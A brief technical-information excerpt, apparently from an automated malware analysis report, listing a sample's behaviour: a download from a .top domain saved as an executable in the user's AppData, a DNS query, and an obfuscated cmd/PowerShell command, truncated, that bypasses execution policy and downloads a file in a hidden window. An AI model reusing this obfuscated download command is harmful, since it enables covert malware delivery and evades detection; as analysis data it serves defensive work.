Technical Information
- http://aoopoerope.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^w^Er^ShE^LL^.exE ^-exEcUt^ioNPoLI^CY BY^PASS -^NOPr^OFilE ^-^WI^ndo^W^S^t^yLe ^h^iDd^eN^ ^(nEW-o^Bj^Ec^t^ SYST^em.^Ne^T.Webc^l^IEn^t)^.DowN^load^f^i^Le('http://aoopo...
- DNS ASK ao###erope.top
- '<SYSTEM32>\cmd.exe' /C "PO^w^Er^ShE^LL^.exE ^-exEcUt^ioNPoLI^CY BY^PASS -^NOPr^OFilE ^-^WI^ndo^W^S^t^yLe ^h^iDd^eN^ ^(nEW-o^Bj^Ec^t^ SYST^em.^Ne^T.Webc^l^IEn^t)^.DowN^load^f^i^Le('http://aoopo...' (with hidden window)